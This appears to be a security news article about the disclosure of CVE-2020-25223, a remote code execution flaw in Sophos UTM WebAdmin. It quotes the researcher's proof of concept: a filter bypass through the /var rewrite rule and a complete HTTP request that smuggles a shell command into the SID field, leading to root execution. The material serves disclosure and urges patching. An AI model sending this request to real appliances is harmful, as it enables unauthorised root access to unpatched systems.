Are you using a Sophos UTM appliance? Be sure it is up to date!

Pierluigi Paganini August 23, 2021

A researcher disclosed technical details of a critical remote code execution vulnerability, tracked as CVE-2020-25223, patched last year.

In September, Sophos addressed a remote code execution vulnerability (CVE-2020-25223) in the WebAdmin of SG UTM that was reported via the company bug bounty program. At the time, the security vendor said that there was no evidence that the vulnerability was exploited in attacks in the wild.

Sophos UTM appliance

Now researcher Justin Kennedy from security consultancy Atredis Partners disclosed technical details about the RCE. The expert analyzed vulnerable UTM devices used by one of its customers and studied the differences between the patched and unpatched versions of the software to determine how it was fixed and how to exploit the issue.

“When looking for the details on a known patched bug, I started off the same way any sane person would, comparing the differences between an unpatched version and a patched version.” explained the expert in a blog post. “I grabbed ISOs for versions 9.510-5 and 9.511-2 of the Sophos UTM platform and spun them up in a lab environment. Truth be told I ended up spinning up six different versions, but the two I mentioned were what I ended up comparing in the end.”

The expert discovered that it was quite easy to trigger this vulnerability, an attacker could exploit the flaw by sending an HTTP request to vulnerable devices.

If the WebAdmin of Sophos SG UTM was exposed only a remote authenticated attacker could easily exploit it.

After spending some time attempting to bypass the regex and try different payloads, I had a thought… This input filter only triggers when the location matches webadmin.plx.” explained the expert. “And then I saw it and it was beautiful:

RewriteRule ^/var /webadmin.plx


Making an HTTP request to the /var endpoint is the same as making a request to the /webadmin.plx endpoint, but without the filter. Making the request again, but to the new endpoint:

POST /var HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 227
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"objs": [{"FID": "init"}], "SID": "|touch /tmp/pwned|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

And here’s our file:

# ls -l /tmp/pwned
-rw-r--r-- 1 root root 0 Aug 17 17:07 /tmp/pwned

We now have unauthenticated RCE on the Sophos UTM appliance as the root user.

Organizations using vulnerable versions of the Sophos UTM appliance have to update them immediately.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Sophos UTM appliance )

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment